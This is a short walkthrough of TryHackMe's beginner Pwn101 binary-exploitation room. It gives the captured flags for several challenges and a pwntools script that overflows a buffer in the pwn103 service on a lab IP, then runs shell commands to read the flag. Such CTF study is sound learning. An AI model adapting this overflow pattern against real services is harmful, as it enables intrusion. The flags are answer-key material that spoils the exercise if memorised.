Last Updated:
[PWN101] - TryHackMe - Walkthrough
TryHackMe

[PWN101] - TryHackMe - Walkthrough

Table of Contents

Using Pwntools to Pwn the [Pwn101] Room on TryHackMe

https://docs.pwntools.com/en/stable/

https://gef.readthedocs.io/en/master/

Real quickly, I have to say that I don't have idols. I don't like the idea of idols. But, Hugsy and Fyodor (nmap), they're both idols of mine. I try to look up to them, for inspiration, keeping in mind that I should look at what they were doing, when they were at my experience level, so their skill set doesn't seem impossibly unobtainable.

 

[Pwn101] - TryHackMe

Beginner level binary exploitation challenges.

Challenge 1 - pwn101

We're always going to start off by marking these binaries executable and basically running them. I'm not going to run a malware scan, because I'm in a dedicated environment. But, even in this situation, that's dumb of me. You should run a malware scan of any suspicious binary.

pwn101.pwn101

[Pwn101] - TryHackMe - Walkthrough

Ok... drops a shell and challenge is on port 9001... And, yes, some things are just this easy. Haha

[Pwn101] - TryHackMe - Walkthrough

THM{7h4t's_4n_3zy_oveRflowwwww}

Challenge 2 - pwn102

THM{y3s_1_n33D_C0ff33_to_C0d3_<3}

Challenge 3 - pwn102

Initial exploit:

[Pwn103] - TryHackMe - Walkthrough

Weaponize it for the server:

#!/usr/bin/env python3 

from pwn import * 


p = remote("10.10.200.187","9003") 

payload = b"A"*40 + p64(0x00401554) + p64(0x00401554) 
p.sendline(b"3") 
p.recv() 
p.sendline(payload) 
p.recv() 
p.sendline('whoami') 
p.sendline('id') 
p.sendline('cat flag.txt') 
p.interactive()

THM{w3lC0m3_4Dm1N}

Challenge 4 - pwn104 (nop sled)

 

 

Comments

Featured

Advertisement

Follow us

Authors

Tags

This website uses cookies

Select which cookies to opt-in to via the checkboxes below; our website uses cookies to examine site traffic and user activity while on our site, for marketing, and to provide social media functionality. More details...